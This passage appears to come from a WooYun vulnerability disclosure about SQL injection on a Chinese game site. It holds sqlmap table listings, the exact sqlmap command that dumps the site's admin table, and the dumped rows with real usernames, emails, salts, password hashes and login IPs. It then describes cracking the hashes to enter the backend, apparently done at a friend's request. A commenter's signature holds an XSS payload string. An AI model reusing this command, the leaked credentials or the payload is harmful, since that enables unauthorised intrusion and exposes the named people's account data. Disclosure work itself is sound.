| sqlmapoutput |
| sso_admin |
| sso_applications |
| sso_members |
| sso_messagequeue |
| sso_session |
| sso_settings |
| tag |
| template_bak |
| test_artice |
| test_artice_data |
| test_picture |
| test_picture_data |
| times |
| type |
| urlrule |
| video |
| video_content |
| video_data |
| video_store |
| vote_data |
| vote_option |
| vote_subject |
| wap |
| wap_type |
| workflow |
+--------------------+
[15:29:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 101 times
[15:29:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:29:48


100张表
下一步:
sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" -D "i_49you" -T "admin"--dump
进管理员表:
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+---------------+
| roleid | userid | lang | card | email | encrypt | username | realname | password | lastloginip | lastlogintime |
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+---------------+
| 1 | 1 | <blank> | <blank> | tanxz@49app.com | s6SCI6 | admin | <blank> | 6074e9112bb7fe18a8aadb8495f73df7 | 113.99.0.43 | 1431054485 |
| 2 | 2 | <blank> | <blank> | fdsafds@qq.com | v9XvY2 | livebasic | test | 27357894d16487c7bb2e196a4d0f77e8 | 183.131.11.101 | 1411466593 |
| 2 | 3 | <blank> | <blank> | qianhm@49app.com | HSCAPv | meimei | 每每 | f1e0824af35f2380c22b730bfdf36e4c | 183.6.152.58 | 1417662909 |
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+-------

2015-06-28 16:23:02的屏幕截图.png


2015-06-28 16:24:12的屏幕截图.png

最后一步,解密进后台
完工~~~~撤。。。
接下来

修复方案:

我也不清楚,朋友让我搞得。。。。

版权声明:转载请注明来源 ’‘Nome@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-06-29 10:24

厂商回复:

这个已经是比较老的了,暂时解决方案是停止这个网站域名了非常感谢白帽子童鞋 @’‘Nome,技术正在紧急修复中

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-29 10:44 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @疯狗,老大厂商要送礼物?我接受么?@上海49游,送礼物还是?不是就不接受了

  2. 2015-07-01 05:36 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @’‘Nome 不接受,@上海49游 他不要就邮给我吧

  3. 2015-07-20 09:33 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    李姐姐的什么神器。?